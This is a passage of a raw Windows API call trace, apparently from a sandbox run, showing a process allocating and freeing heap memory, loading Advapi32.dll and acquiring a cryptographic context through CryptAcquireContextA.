1 [0229.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0229.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0229.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0229.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0229.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0229.629] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0229.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0229.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0229.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0229.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0229.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0229.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0229.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0229.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.630] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0229.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.630] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0229.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0229.630] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0229.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0229.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0229.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0229.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0229.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0229.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0229.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0229.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0229.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0229.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0229.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0229.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0229.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0229.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0229.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0229.631] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0229.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0229.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0229.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0229.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0229.631] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0229.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0229.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0229.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0229.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0229.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0229.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0229.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0229.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0229.631] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0229.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0229.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0229.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0229.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0229.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0229.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0229.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0229.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0229.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0229.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0229.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0229.632] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0229.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0229.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0229.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0229.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0229.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0229.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0229.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0229.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0229.633] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0229.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0229.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0229.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0229.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0229.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0229.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.633] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.634] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0229.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0229.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.634] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0229.634] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0229.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0229.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0229.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0229.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0229.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0229.635] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0229.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0229.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0229.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0229.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0229.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0229.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0229.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0229.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69a08 [0229.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69a08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0229.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0229.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0229.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0229.635] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0229.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0229.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0229.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0229.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0229.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0229.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0229.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0229.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0229.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0229.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0229.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0229.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0229.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0229.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0229.636] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0229.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0229.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0229.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0229.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0229.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0229.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0229.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0229.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0229.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0229.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0229.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0229.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0229.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0229.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0229.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0229.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0229.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0229.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0229.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0229.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0229.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0229.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0229.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0229.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0229.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0229.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0229.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0229.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0229.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0229.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0229.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0229.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0229.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0229.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0229.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0229.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0229.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0229.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0229.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0229.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0229.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0229.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0229.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0229.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0229.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0229.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0229.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0229.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0229.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0229.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0229.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0229.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0229.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0229.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0229.641] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0229.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0229.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0229.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0229.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0229.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0229.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0229.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0229.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0229.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0229.642] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0229.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0229.642] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0229.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0229.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0229.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0229.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ef8 [0229.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0229.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0229.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0229.642] RtlAllocateHeap 